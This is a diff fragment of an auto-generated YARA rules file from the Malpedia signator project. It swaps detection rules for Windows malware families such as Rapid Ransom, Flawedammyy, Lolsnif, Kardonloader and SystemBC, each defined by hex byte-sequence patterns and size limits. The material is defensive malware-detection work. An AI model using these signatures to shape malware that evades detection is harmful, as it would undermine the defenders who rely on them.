+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.starcruft_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "a52d08446edf10d117ae2bacde4f93e5d2e9e0eaf470758c0d7eff835edf2d23"
+		logic_hash = "96896309775ea1553e784bf38519d110c5e6ff85ff5070e7ca85592bc9b55bb1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124767,32 +124631,32 @@ rule MALPEDIA_Win_Bolek_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f76b10 0fa4ce01 03c9 03c8 8b4340 13f2 f72f }
-		$sequence_1 = { 8bec 83ec18 53 56 57 33c0 8bfa }
-		$sequence_2 = { 8b55f8 391401 7416 41 3bce 72f6 33c0 }
-		$sequence_3 = { 0f84a5000000 8b45f4 8b7028 83c60c 0375e0 e9???????? 8d45e8 }
-		$sequence_4 = { c606ff 3dff000000 751a 6a05 6a06 5a 32c9 }
-		$sequence_5 = { ffb42450080000 50 8d84244c060000 50 e8???????? 8d442444 55 }
-		$sequence_6 = { 899c248c000000 89b42490000000 e8???????? 83c440 85c0 0f85e7fdffff 53 }
-		$sequence_7 = { ff742444 8d442434 50 e8???????? 6a10 8d44243c 55 }
-		$sequence_8 = { ff742438 ff742438 56 e8???????? 69ce0d661900 83c40c 8bf8 }
-		$sequence_9 = { 894dec c745f440000000 894df8 894dfc ff15???????? 8be5 5d }
+		$sequence_0 = { 83c40c 8b45ec 50 e8???????? 83c404 8b4de8 894dec }
+		$sequence_1 = { 85c0 7505 83c8ff eb17 6a00 8b55ec }
+		$sequence_2 = { ff15???????? 8945e4 837de400 740c e8???????? }
+		$sequence_3 = { 8d4dfc 51 8d95f0f9ffff 52 6a13 8d8538fbffff }
+		$sequence_4 = { 8955fc 8b45f8 8945f0 eb09 8b4df0 83c102 }
+		$sequence_5 = { 83c408 83f8ff 7516 6a00 8d95c8fcffff 52 8d85d0fdffff }
+		$sequence_6 = { 6a36 8b4d08 83c158 51 e8???????? 83c40c 6a40 }
+		$sequence_7 = { e9???????? 6a00 8b95e4f5ffff 52 ff15???????? 8b4d10 8901 }
+		$sequence_8 = { 8d95f0feffff 52 e8???????? 83c40c 6804010000 8d85ecfdffff 50 }
+		$sequence_9 = { 6a06 8d9578fbffff 52 e8???????? 83c410 8d85d0fbffff 50 }
 
 	condition:
-		7 of them and filesize < 892928
+		7 of them and filesize < 294912
 }
-rule MALPEDIA_Win_Rapid_Ransom_Auto : FILE
+rule MALPEDIA_Win_Lolsnif_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c19fad8c-a407-5bf5-acec-08286bdf3f5a"
+		id = "801276e5-64e7-59d1-a653-8ee4b7f16dc4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rapid_ransom_auto.yar#L1-L164"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lolsnif"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lolsnif_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "67800a8541a0930476ccb252960ba42436cf1502df6e201c2920e486423cdc16"
+		logic_hash = "4100f8ab27f3910e5c0d280cf414b7c267c81147c4a7bc07b3262d87c3731e63"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124806,37 +124670,32 @@ rule MALPEDIA_Win_Rapid_Ransom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 6801000004 6800a40000 ff75f8 }
-		$sequence_1 = { eb05 803e00 7509 803a00 0f840c010000 }
-		$sequence_2 = { ff15???????? 8b4c2438 f6c110 7410 68???????? 56 }
-		$sequence_3 = { 6a00 6a07 6a00 ff75fc ffd7 }
-		$sequence_4 = { 75f7 ff75fc 51 6801000040 ff750c 53 ff15???????? }
-		$sequence_5 = { 84c0 0f94c1 33c0 84c9 5f 5e 0f94c0 }
-		$sequence_6 = { ff15???????? 56 ffd7 8bd0 8bce e8???????? }
-		$sequence_7 = { 80c261 8857ff 4b 75eb 8b75fc 5b }
-		$sequence_8 = { a3???????? e8???????? 83c404 b001 5e }
-		$sequence_9 = { 6a02 6a00 6a03 68000000c0 8d85f8feffff 50 }
-		$sequence_10 = { 56 ff15???????? 85c0 7448 8b3d???????? }
-		$sequence_11 = { 8d7601 80becc8c410000 75f4 e8???????? 99 8d4eff }
-		$sequence_12 = { 83ea01 75f2 8b7dac 8b55b4 33c0 c6043200 }
-		$sequence_13 = { 8d7f08 8b048dc4724000 ffe0 f7c703000000 7413 }
-		$sequence_14 = { eb05 1bc0 83c801 8b4df0 85c0 0f84a0feffff }
+		$sequence_0 = { 7313 57 57 57 57 53 ff75fc }
+		$sequence_1 = { 5b c20c00 55 8bec 83ec14 817d0c00100000 }
+		$sequence_2 = { b892e8ffff c3 55 8bec 83ec40 53 56 }
+		$sequence_3 = { e8???????? 8bf0 3bf3 7439 3bfb 7411 8b4718 }
+		$sequence_4 = { 33db 53 c744241001000000 bf???????? ffd6 ff7508 57 }
+		$sequence_5 = { f00fc108 a1???????? 83c040 50 ffd3 a1???????? 56 }
+		$sequence_6 = { eb06 41 894804 33ff 5b 8bc7 5f }
+		$sequence_7 = { 3bc6 8945f4 754d 8b4dc0 56 ff35???????? 8bc1 }
+		$sequence_8 = { ab ab 8d442428 50 8d44241c 50 }
+		$sequence_9 = { ff7704 e8???????? 3de8000000 7509 834dfcff e9???????? }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 425984
 }
-rule MALPEDIA_Win_Danbot_Auto : FILE
+rule MALPEDIA_Win_Diztakun_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "20935e71-f906-54b9-9bae-c4a4caef1aba"
+		id = "438551c7-604a-5ad2-954a-f3ff63f3cb31"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.danbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.danbot_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.diztakun"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.diztakun_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "acd94691ea40c5baca6316ac758413a2314f96bf1ccb4eb7ca1bd69319a91f06"
+		logic_hash = "fc2cd18a0fc5853e5904a0ff7267816d8fa89853fb1e9c46e2210edfcdfdf3de"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124850,32 +124709,32 @@ rule MALPEDIA_Win_Danbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c8965f0 4c896df8 448865e0 488d5580 488d4d00 e8???????? }
-		$sequence_1 = { 4585c0 0f840e020000 89bb88000000 4183f803 0f82b6000000 8b8394000000 85c0 }
-		$sequence_2 = { 55 56 57 4881ec90000000 48c7442420feffffff 49895b18 488b05???????? }
-		$sequence_3 = { 483bd7 720e 48ffc2 4d8bc6 498b0f e8???????? }
-		$sequence_4 = { 488bda 33c0 488b5110 4983c8ff 89442420 48894310 48c743180f000000 }
-		$sequence_5 = { ffd3 99 33c2 2bc2 89442430 448be0 4c89642450 }
-		$sequence_6 = { eb03 488bd9 8b4018 25c0010000 410f100424 beffff0000 83f840 }
-		$sequence_7 = { 488bce ffd3 90 488b742478 488b06 488b5838 488bcb }
-		$sequence_8 = { 48897310 4c897318 408833 0f1007 0f1103 0f104f10 0f114b10 }
-		$sequence_9 = { 498bcd e8???????? 4533d2 84c0 741d 418adc 488bcf }
+		$sequence_0 = { 7f05 b8???????? e8???????? 8b4c2444 8b5c2428 8b6c2430 }
+		$sequence_1 = { 53 e8???????? cc 5a 58 }
+		$sequence_2 = { 7d0c 57 8bcb e8???????? 8b542418 8b0b 3bf5 }
+		$sequence_3 = { e9???????? 8b451c 83c0c7 56 83f80b 0f87c4000000 ff2485ffff4000 }
+		$sequence_4 = { 7574 8b4008 3bc6 746d 663930 7468 8b5808 }
+		$sequence_5 = { 50 8d84241c020000 64a300000000 8b84242c020000 6a00 6a00 8d4c2420 }
+		$sequence_6 = { ff15???????? 83c6f0 56 e8???????? 8b7c2418 83c010 8907 }
+		$sequence_7 = { 89642418 8bfc 50 e8???????? 83c010 83c404 8907 }
+		$sequence_8 = { 8b8254010000 83c404 8bcb ffd0 }
+		$sequence_9 = { 8bd9 895c2414 c744241000000000 e8???????? 33c9 85c0 0f95c1 }
 
 	condition:
-		7 of them and filesize < 1492992
+		7 of them and filesize < 688128
 }
-rule MALPEDIA_Win_Mrdec_Auto : FILE
+rule MALPEDIA_Win_Kardonloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5cd525b0-3fcd-5de1-aa88-bd5dca592c29"
+		id = "57227c50-5901-516a-b863-0f33adb6b519"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mrdec"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mrdec_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kardonloader_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "c22120d79fe39ae9d27a4d21c75a9bbd9a26aee0b664e8fa2f821d0411c6aa0d"
+		logic_hash = "bf2ff4ff4bbba7fc1d200f179fb3f5bc11f84479969b4348f603834a274497e5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124889,32 +124748,32 @@ rule MALPEDIA_Win_Mrdec_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c64446fa00 57 56 e8???????? 68???????? 56 e8???????? }
-		$sequence_1 = { 6a00 8d45cc 50 68ef000000 68???????? }
-		$sequence_2 = { 50 ff75f0 6a00 6a00 6a00 ff75e8 e8???????? }
-		$sequence_3 = { 7532 68dc050000 ff75dc 68???????? e8???????? }
-		$sequence_4 = { 6a00 6814010000 68???????? ff75d8 e8???????? 8d3550514000 }
-		$sequence_5 = { 8bec ff7508 6a40 e8???????? 0bc0 750c 68c8000000 }
-		$sequence_6 = { 81c700020000 68???????? 57 e8???????? 68???????? 57 e8???????? }
-		$sequence_7 = { 59 51 80c141 884808 ff05???????? 6a00 6a00 }
-		$sequence_8 = { 6a02 e8???????? 0bc0 0f8530010000 c745f000400000 ff75f0 }
-		$sequence_9 = { 6a00 6a00 e8???????? ff75dc e8???????? }
+		$sequence_0 = { c0e904 8a8018314000 c0e002 0ac8 880c32 8bc2 }
+		$sequence_1 = { 663bc8 751c 8b4208 8bf0 c1ee10 6683f801 6a06 }
+		$sequence_2 = { 89450c 786a 0fb6443b01 8a9018314000 0fb6443b02 8a9818314000 }
+		$sequence_3 = { 68???????? e8???????? 8bf0 85f6 0f844a010000 }
+		$sequence_4 = { 7819 53 6800040000 8d8550f6ffff }
+		$sequence_5 = { 58 0fb7f1 663bc8 751c 8b4208 8bf0 }
+		$sequence_6 = { 84c0 ba???????? b9???????? 8d857cffffff 0f44ca }
+		$sequence_7 = { 51 8d8578fcffff 50 68???????? }
+		$sequence_8 = { 8bec 81ec1c020000 56 8b35???????? 57 6810270000 ffd6 }
+		$sequence_9 = { 83c40c 8bcf 5f c6043100 8bc6 5e }
 
 	condition:
-		7 of them and filesize < 44864
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Icefog_Auto : FILE
+rule MALPEDIA_Win_Norobot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5a2327d1-90cc-5721-943f-064b1c43e2e0"
+		id = "81ee252e-ea83-5b53-acab-35755b04ba71"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.icefog_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.norobot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.norobot_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "ccfebce12d112e2d237d6de3048b8cc676f213fd05f617884709a0f4f9ea859a"
+		logic_hash = "cfe0160692facfa8b89f040016e3df094319abbfbfe52416eb1da1d5fe06ee4b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124928,32 +124787,32 @@ rule MALPEDIA_Win_Icefog_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 895de0 c745e400ff0000 e9???????? 8b5e04 c1e310 895de0 c745e40000ff00 }
-		$sequence_1 = { e8???????? 8b759c 53 c60300 e8???????? 8b45b4 83c404 }
-		$sequence_2 = { 8b4d0c 50 51 e8???????? 83c408 8bf0 5e }
-		$sequence_3 = { c6470300 8b7d08 75a0 8b5d0c 8b45f4 015f0c 5f }
-		$sequence_4 = { b807000000 5b 8be5 5d c3 8945fc 394604 }
-		$sequence_5 = { 8b4dfc 50 51 e8???????? 56 8947f6 e8???????? }
-		$sequence_6 = { c3 56 57 e8???????? 83c408 894590 85c0 }
-		$sequence_7 = { dd8570feffff dec3 d9ca dd9560feffff d8d1 dfe0 ddd9 }
-		$sequence_8 = { a1???????? 891490 8b0d???????? 42 3bd1 7ced a1???????? }
-		$sequence_9 = { 8b4508 85c0 7416 56 8b7010 50 e8???????? }
+		$sequence_0 = { c6400800 488b442408 c3 48894c2408 4883ec28 488b442430 488bc8 }
+		$sequence_1 = { 4883c420 5b c3 4883611000 488d0520b20100 48894108 488d0505b20100 }
+		$sequence_2 = { 4d3bc4 0f84ba000000 8b7500 498b9cf620c60300 90 4885db 740e }
+		$sequence_3 = { 4883ec68 488b05???????? 4833c4 4889442450 4883bc248000000000 7f07 }
+		$sequence_4 = { 4c8d4c2428 4c8d442430 488bd0 488b4c2450 e8???????? 488b442450 }
+		$sequence_5 = { 4883bc248800000000 0f8482000000 33c0 83f801 }
+		$sequence_6 = { 4c8d0576750000 41f644400201 7405 0fb6c9 eb25 0fb6d1 }
+		$sequence_7 = { 7536 488d15db130300 488b8c24c0100000 e8???????? 8b442440 83c801 89442440 }
+		$sequence_8 = { 4c8d057b1a0100 488d157c1a0100 b912000000 e8???????? 4885c0 741d 49ba7073d836192e55f3 }
+		$sequence_9 = { e8???????? 0fb6c0 85c0 7448 48837c245000 7507 837c245801 }
 
 	condition:
-		7 of them and filesize < 1187840
+		7 of them and filesize < 545792
 }
-rule MALPEDIA_Win_Htprat_Auto : FILE
+rule MALPEDIA_Win_Systembc_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e0f24e75-a1ab-500e-b0d4-d1209cde7f99"
+		id = "9f869723-6075-5b32-a402-475b08d3e463"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.htprat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.htprat_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.systembc_auto.yar#L1-L162"
 		license_url = "N/A"
-		logic_hash = "e91a3a65365c65376e7831a92808c9a23ec534df8de8b5e0e4180f6424135b1f"
+		logic_hash = "9ee9f5ea5ece65bf2a7fd4bf4633a524cd0ca65ce3683cb8ae8b66a7bc9315ba"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124967,32 +124826,38 @@ rule MALPEDIA_Win_Htprat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 8db794010000 c645fc0c e8???????? 53 }
-		$sequence_1 = { 743c 33c0 57 50 668985d8f9ffff }
-		$sequence_2 = { 8bcb e8???????? 57 57 89b398000000 }
-		$sequence_3 = { 57 57 57 ffb574efffff }
-		$sequence_4 = { 832700 8d7708 c6470400 e8???????? 8365fc00 bb???????? 53 }
-		$sequence_5 = { e9???????? 6a22 e9???????? 6a0c e9???????? 83e96e 7479 }
-		$sequence_6 = { 8d742430 e8???????? 8bd6 8d4c2418 c68424e800000009 }
-		$sequence_7 = { 83671000 c747140f000000 c60700 837de810 8b45d4 895d80 }
-		$sequence_8 = { 8d442468 ff742478 50 8d8424a8000000 50 e8???????? 83c40c }
-		$sequence_9 = { 8d741eff 8d5801 56 57 }
+		$sequence_0 = { b000 ae 75fd 8a57fe }
+		$sequence_1 = { 8b7d0c 8b4d10 f3a4 5e }
+		$sequence_2 = { 33c0 ab 837d0c00 7403 ff47fc }
+		$sequence_3 = { e8???????? 8d5804 6a18 e8???????? 83c061 aa }
+		$sequence_4 = { 57 56 ff7508 e8???????? 8bd0 }
+		$sequence_5 = { 66837aff00 7502 eb2e 837d0cff 7518 837d1000 }
+		$sequence_6 = { c7049e00000000 b800000000 5e 5f 5b }
+		$sequence_7 = { 8b4514 ab 8b4518 ab b801000000 }
+		$sequence_8 = { 6a01 6a00 8b85bcfbffff 8b08 8b5118 50 }
+		$sequence_9 = { c68573ffffff05 c68574ffffff01 c68575ffffff00 c68576ffffff01 48c78510ffffff01000000 }
+		$sequence_10 = { 4883c420 66c7474e0100 c6475101 c6477b00 4883ec40 }
+		$sequence_11 = { 0f858e010000 4883ec20 48c7c100000000 48c7c200000100 }
+		$sequence_12 = { 49c7c0faff0000 49c7c100000000 ff15???????? 4883c420 }
+		$sequence_13 = { e8???????? 4883c420 4883ec20 488d8e88010000 488d55b0 }
+		$sequence_14 = { 4c8d474e 49c7c132000000 e8???????? 4883c420 488b4598 4883c01c 4883ec20 }
+		$sequence_15 = { 488b8d48f9ffff 498d1438 4c8bc0 49c7c100000000 }
 
 	condition:
-		7 of them and filesize < 278528
+		7 of them and filesize < 75776
 }
-rule MALPEDIA_Win_Nabucur_Auto : FILE
+rule MALPEDIA_Win_Combos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9022825e-08e1-5228-a8ab-7502f1d2e737"
+		id = "cc69e396-00ed-59a2-ba11-780fc1f2665b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nabucur"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nabucur_auto.yar#L1-L155"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.combos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.combos_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "1073a8071d9c420307c019b8193b4c07d15bc5ab7630e60f5042626f0d12ed0f"
+		logic_hash = "197be11859075969cf043a035f09c4b79bbdaf0b1f0ee080745a9acd79282960"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125006,40 +124871,34 @@ rule MALPEDIA_Win_Nabucur_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48 894500 85c0 7fee }
-		$sequence_1 = { 48 8944241c 85c0 7fd1 }
-		$sequence_2 = { 48 83f801 89442418 0f8f15ffffff }
-		$sequence_3 = { 48 83e908 85c0 75f0 57 }
-		$sequence_4 = { 48 8906 8d442410 50 }
-		$sequence_5 = { 009eaa030000 0fb686aa030000 57 83f80a 0f876d010000 }
-		$sequence_6 = { 33ff 397c242c 7e61 8b6c242c 8b03 8d4c0001 81f900020000 }
-		$sequence_7 = { 48 89442414 85c0 0f8f68ffffff }
-		$sequence_8 = { 89728e 5f 5c ab }
-		$sequence_9 = { e9???????? ffd6 e9???????? 5e e9???????? 68ad009a0c }
-		$sequence_10 = { ba0eb4d3fc 83c604 eb0c 83f901 }
-		$sequence_11 = { 8bec 68???????? e8???????? 813d????????1d932600 }
-		$sequence_12 = { e022 0884df221d84c2 221b 84dd 223c84 }
-		$sequence_13 = { b4d6 98 db3e d35f9e c25a1a }
-		$sequence_14 = { af 6abb 8ed5 3155fc }
-		$sequence_15 = { 91 039109861780 60 96 }
+		$sequence_0 = { f3ab c1e604 aa 8d9e50120110 803b00 8bcb }
+		$sequence_1 = { 899ddcfeffff 899dd4feffff 895dfc 8b4508 }
+		$sequence_2 = { e8???????? 8b35???????? 83c408 6a0a ffd6 a1???????? }
+		$sequence_3 = { 81ec00020000 57 b93f000000 33c0 8d7c2405 }
+		$sequence_4 = { 0bc5 33c1 8b848600ffffff 0bc7 5f 5e }
+		$sequence_5 = { 6800010000 51 57 ffd6 8d542408 }
+		$sequence_6 = { 33ff 89bdccfeffff 89bdc8feffff c785a0feffff24000000 c785a4feffff03000100 c785a8feffff08000000 8d85c8feffff }
+		$sequence_7 = { 6a00 56 8b74243c 56 ffd3 83c428 }
+		$sequence_8 = { 80c120 888800190110 eb1f 83f861 }
+		$sequence_9 = { 33c0 89442418 8944241c 85db }
 
 	condition:
-		7 of them and filesize < 1949696
+		7 of them and filesize < 163840
 }
-rule MALPEDIA_Win_Flawedammyy_Auto : FILE
+rule MALPEDIA_Win_Backspace_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e3c09ec0-5af5-5a07-8c2f-fc3c122b7323"
+		id = "fb0b0e7f-6932-5f0b-957b-77772fb8dfd5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.flawedammyy_auto.yar#L1-L303"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.backspace_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "4b49ab8817339f4687e717d3eeefa35a990a787f8625678c6db9867d20e78208"
+		logic_hash = "8089ff963941257a60e744d7204434da2ea9ab918c2bf4c32b875cf83b55a865"
 		score = 75
-		quality = 33
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -125051,54 +124910,32 @@ rule MALPEDIA_Win_Flawedammyy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0022 8a4200 828a4200bb8a42 00ff }
-		$sequence_1 = { 004bbf 42 0062bf 42 }
-		$sequence_2 = { ffd3 f30f7e45ec 8b4df4 83ec10 8b11 }
-		$sequence_3 = { 68???????? 8d4df0 e8???????? 8b00 85c0 7404 8b10 }
-		$sequence_4 = { 8d8da0f6ffff 6a00 6a23 51 6a00 ffd0 8b35???????? }
-		$sequence_5 = { 0062bf 42 0079bf 42 }
-		$sequence_6 = { 68f1cbf7ae 6a01 e8???????? 83c408 }
-		$sequence_7 = { 002a e342 0039 e342 }
-		$sequence_8 = { ff5108 8b45fc 50 8b08 ff5108 8b45e4 }
-		$sequence_9 = { 59 8b7d08 833cfde897410000 755b }
-		$sequence_10 = { 0039 e342 0048e3 42 }
-		$sequence_11 = { 0000 0404 0404 0404 0401 }
-		$sequence_12 = { 83ec10 660fd600 f30f7e45ac 660fd64008 f30f7e8578ffffff 8bc4 }
-		$sequence_13 = { c78508ffffff44000000 66898538ffffff e8???????? 83c404 85c0 7511 68???????? }
-		$sequence_14 = { 00b3854200e5 854200 37 864200 }
-		$sequence_15 = { 0018 874200 58 874200 }
-		$sequence_16 = { 7e09 8a0e 880a 4a 4e 48 75f7 }
-		$sequence_17 = { ff75ac 8b3d???????? ffd7 ff75a8 }
-		$sequence_18 = { 5e 5b c3 55 8bec 81ec5c040000 }
-		$sequence_19 = { e9???????? 33c0 8b7df4 8b0c855c303400 c1e705 }
-		$sequence_20 = { 53 ff75dc 6813100000 ff35???????? ffd6 }
-		$sequence_21 = { ff15???????? eb08 6a64 ff15???????? 53 ff75a8 ff15???????? }
-		$sequence_22 = { eb0e 8b14957c303400 49 0fafd1 0155fc }
-		$sequence_23 = { 7426 8b483c ba???????? 03c8 50 66c741160e01 66c7415c0300 }
-		$sequence_24 = { 8b0c855c303400 c1e705 33d2 03fe }
-		$sequence_25 = { 0f872affffff 0fb6805a213400 ff2485f6203400 8b8614080000 3b45f4 7e03 8945f4 }
-		$sequence_26 = { 7516 68???????? e8???????? 53 ff15???????? e9???????? }
-		$sequence_27 = { 56 8a0a 80f930 7569 }
-		$sequence_28 = { c745e8ff000000 8b3c857c303400 c745ecffff0000 0faff9 83f801 c745f0ffffff00 741f }
-		$sequence_29 = { 8b4d08 8a0408 a2???????? eb07 c605????????00 c705????????4c403400 ff7508 }
-		$sequence_30 = { 7518 8b46f8 8b04855c303400 c1e002 50 6a40 }
-		$sequence_31 = { 83f907 0f8781000000 ff248dfd243400 881f eb76 ff30 eb63 }
+		$sequence_0 = { 8d8578fdffff 56 50 89b579fdffff e8???????? }
+		$sequence_1 = { 90 745f 90 13c9 90 eb20 }
+		$sequence_2 = { 68???????? 50 ff15???????? 6a0a 58 }
+		$sequence_3 = { 6a00 68???????? 68???????? 6a50 56 e8???????? 83c420 }
+		$sequence_4 = { 7e1a 8b4c240c 8b442404 56 2bc1 8bf2 }
+		$sequence_5 = { f7f9 55 8b35???????? 8bd8 a1???????? 2b05???????? 0fafc3 }
+		$sequence_6 = { 66ab aa 8d8580fdffff 6800020000 50 53 }
+		$sequence_7 = { a1???????? 57 40 50 ff15???????? 85c0 0f8fa3000000 }
+		$sequence_8 = { c3 55 8bec b808200000 e8???????? 53 56 }
+		$sequence_9 = { 57 50 ffd6 83c418 85db }
 
 	condition:
-		7 of them and filesize < 1350656
+		7 of them and filesize < 131072
 }
-rule MALPEDIA_Win_Buzus_Auto : FILE
+rule MALPEDIA_Win_Madmax_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "51e8e3ea-5fd9-5a65-8632-fc964a25884b"
+		id = "211dedfc-7c78-54d2-bc9c-659fc1684566"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.buzus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.buzus_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.madmax_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "45f59120d6ee3fd13d7fe4ef65dc14248ca6854e32422138403891c6247259ef"
+		logic_hash = "cf6b2a7b533fb3f99bc15493e8a8779b3f938c747aabda5388a89eac12fccb62"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125112,32 +124949,32 @@ rule MALPEDIA_Win_Buzus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d85d8faffff 50 ffd6 6804010000 8d85ccfdffff ff75a0 50 }
-		$sequence_1 = { 4e 46 897508 ebbd 803e2a 750b 83f801 }
-		$sequence_2 = { 59 7413 ff751c 68???????? ff36 56 e8???????? }
-		$sequence_3 = { 891d???????? 68???????? ffd5 85c0 740a c705????????01000000 }
-		$sequence_4 = { b8???????? ba???????? 89858cfcffff 8985a0fcffff b8???????? 57 c785fcfbffffc8c94000 }
-		$sequence_5 = { 8b742410 33db 33ed 3bf3 7e58 }
-		$sequence_6 = { 53 8d5904 57 6a00 ffd6 59 }
-		$sequence_7 = { c78574feffffa8cf4000 c78578feffff9ccf4000 c7857cfeffff90cf4000 c78580feffff84cf4000 c78584feffff54cf4000 c78588feffff44cf4000 c7858cfeffff2ccf4000 }
-		$sequence_8 = { 44 1573d2446b 68ded17fda ca426b 68dddb1ffb 06 9f }
-		$sequence_9 = { 5f c9 c3 e8???????? 68a5040000 ff15???????? ebee }
+		$sequence_0 = { f605????????5a 0f85ea000000 95 8883424ceb3e 38af847bb313 8320aa d590 }
+		$sequence_1 = { fa 768b 872a fd 2a4f0e e8???????? b3df }
+		$sequence_2 = { af 2f ac 7cd6 45 98 92 }
+		$sequence_3 = { bf45f19eb2 ac a5 d6 34e2 1117 4c }
+		$sequence_4 = { e6d1 f5 9f 45 7b78 39770f d0de }
